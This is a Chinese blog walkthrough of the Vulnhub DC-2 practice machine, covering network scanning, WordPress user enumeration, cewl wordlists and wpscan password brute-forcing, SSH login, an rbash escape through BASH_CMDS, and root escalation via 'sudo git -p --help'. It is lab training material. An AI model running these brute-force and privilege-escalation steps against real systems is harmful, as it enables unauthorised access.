Vulnhub 靶机实战系列：DC -2

最新推荐文章于 2024-05-18 19:56:12 发布

王玄清

最新推荐文章于 2024-05-18 19:56:12 发布

阅读量315

点赞数 1

分类专栏： DC 文章标签：安全 linux 靶机

本文链接：https://blog.csdn.net/weixin_45752674/article/details/117398707

版权

DC 专栏收录该内容

2 篇文章 0 订阅

订阅专栏

Vulnhub 靶机实战系列：DC -2

信息收集
- - 内网扫描
  - 扫描主机
Flag1
- - 添加hosts文件
Flag2
Flag3
- - ssh登录
Flag4
- - 设置环境变量
Final Flag
- - 提权
  - 修改密码

信息收集

内网扫描

arp-scan -l
Kali ip: 192.168.175.134
DC-2 ip:192.168.175.135

在这里插入图片描述

扫描主机

nmap -A 192.168.175.135 
80/tcp open
nmap -sV -p- 192.168.175.135		//-sV 扫描目标主机和端口上运行的软件的版本;-p- 扫描0-65535全部端口
80/tcp   open  http
7744/tcp open  ssh

在这里插入图片描述

Flag1

访问192.168.175.135 本地无法解析域名dc-2
在这里插入图片描述

添加hosts文件

vim /etc/hosts		//编辑/etc/hosts文件，添加靶机IP地址及域名

在这里插入图片描述
在Flag页面找到flag1
提示用cewl密码字典生成工具

Flag 1:
Your usual wordlists probably won’t work, so instead, maybe you just need to be cewl.
More passwords is always better, but sometimes you just can’t win them all.
Log in as one to see the next flag.
If you can’t find it, log in as another.

Flag2

flag1提示可以登录，但正常访问网页无法找到登录页面，

nikto -h dc-2 -o nikto-dc2.txt		//nikto 扫描网站结构
cat dc-2.nikto
http://dc-2/wp-login.php		//wp模板后台登陆页面默认是wp-login.php

在这里插入图片描述
访问登录页面：http://dc-2/wp-login.php

wpscan工具扫描网站

wpscan --url dc-2 -e u		//wpscan工具扫描网站
User(s) Identified: admin	jerry	tom

在这里插入图片描述

添加用户名

vim dc-2users.list		//将扫描到的三个用户名添加到dc-2users.list
//新建一个.list文件（例如：dc-2users.list）将扫描到的三个用户名添加到该文件中。

在这里插入图片描述

生成密码字典

cewl dc-2 -w dc-2.dic		//使用flag1中提示的工具cewl生成密码字典dc-2.dic

在这里插入图片描述

wpscan爆破

wpscan --url dc-2 -U dc-2users.list -P dc-2.dic		//使用wpscan工具爆破可以登录用户的密码，可成功爆破tom和jerry用户
[!] Valid Combinations Found:
 | Username: jerry, Password: adipiscing
 | Username: tom, Password: parturient

在这里插入图片描述
使用tom登录，没找到有用信息
使用jerry登录，找到flag2

jerry login
Flag 2:
If you can't exploit WordPress and take a shortcut, there is another way.
Hope you found another entry point.

在这里插入图片描述

Flag3

ssh登录

ssh tom@192.168.175.135 -p 7744		//tom  ssh登录

在这里插入图片描述

flag3 :
Poor old Tom is always running after Jerry. Perhaps he should su for all the stress he causes.

Flag4

设置环境变量

BASH_CMDS[a]=/bin/sh	//调用/bin/sh命令解释器
a		//a 命令 切换了命令解释器为 /bin/sh 突破了 rbash的限制
/bin/bash		//使用bash命令解释器
export PATH=PATH:/bin:/sbin:/usr/bin:/usr/sbin		//设置环境变量

在这里插入图片描述

su jerry		//切换到jerry用户
adipiscing		//jerry用户登录密码
Flag4：
Good to see that you've made it this far - but you're not home yet.
You still need to get the final flag (the only flag that really counts!!!). 
No hints here - you're on your own now.  :-)
Go on - git outta here!!!!

在这里插入图片描述

Final Flag

提权

sudo -l		//查看可以使用root权限无密码的命令，有git命令
sudo git -p --help		//提权
!/bin/bash		//获得root权限

在这里插入图片描述

修改密码

passwd root		//修改root密码
111111	//密码修改为：11111
su root		//切换root用户
cd /root		//进入root目录
ls		//找到final-flag.txt

在这里插入图片描述

王玄清

关注

1
点赞
踩
3

收藏

觉得还不错? 一键收藏
打赏
3
评论
Vulnhub 靶机实战系列：DC -2

Vulnhub 靶机实战系列：DC -2arp-scan -lIPv4: 192.168.175.134VMware ip:192.168.175.135 nmap -A 192.168.175.135 80/tcp openvim /etc/hostsFlag 1:Your usual wordlists probably won’t work, so instead, maybe you just need to be cewl.More passwords is al
复制链接

扫一扫